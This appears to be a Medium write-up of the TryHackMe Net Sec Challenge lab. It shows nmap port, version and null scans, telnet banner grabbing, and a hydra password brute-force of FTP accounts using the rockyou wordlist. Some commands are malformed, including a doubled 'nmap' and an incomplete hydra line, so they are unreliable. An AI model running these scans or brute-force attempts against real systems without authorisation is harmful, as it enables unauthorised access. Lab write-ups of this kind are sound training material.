TryHackMe: Net Sec Challenge

This is a write up for the THM Net Sec Challenge —
We already have a number of write-ups but I thought I’d attempt to give a little more explanation on my approach, since there are many ways of skinning a cat.

What is the highest port number being open less than 10,000?

nmap nmap -sS -T4 -p1000-9999 TARGET

Since there was a hint for 4-digit port, best approach will be to limit the scans to run from 1000 (least possible) to 9999 (highest possible).
Then I use stealth-scan (-sS) which does not do the 3-way handshake hence faster.
The -T4 option is an aggressive approach of probing with very little pausing time.

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

Same idea as the previous one:

The scan will take long, you don’t have to wait, as that runs, fire up a new terminal and move to the next one.

nmap -sS -T4 -p10000-65535 TARGET

How many TCP ports are open?

Another one that will take some time, run this as you head to the next one.

nmap -sS -T4 -p- TARGET

What is the flag hidden in the HTTP server header?

There are many ways you can tackle this, but the simplest way would be using telnet:

telnet IP 80
GET / HTTP/1.1

What is the flag hidden in the SSH server header?

Telnet will do the trick:

telnet IP 22

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

From your list of open ports, there’s one port that is nonstandard (unknown):

nmap -sS -sV -p<port>

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

Since we have the FTP port from the previous question, we can use this with hydra:

hydra -l <user-name> -P /usr/share/wordlists/rockyou.txt<port>

Now that we have the password, we can ftp into the server and catch the flag:

$ ftp
ftp> get <IP> <port>
ftp> ls
ftp> get <flag_file>

Browsing to http://IP:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

nmap -sN -v TARGET





Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

An Overview on DDoS Attacks

Best Privacy Browser

Exploit + Bug = $33M locked

Decentralized Big Data platform gives users control and reward

The digital identity imperative

{UPDATE} It's Full of Sparks Hack Free Resources Generator

Network Services 2 (MySQL) — TryHackMe

Answer Questions and Win $300!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store



More from Medium

Tryhackme | Nmap

Driver — Hackthebox Walkthrough

Alfred —  TryHackMe walkthrough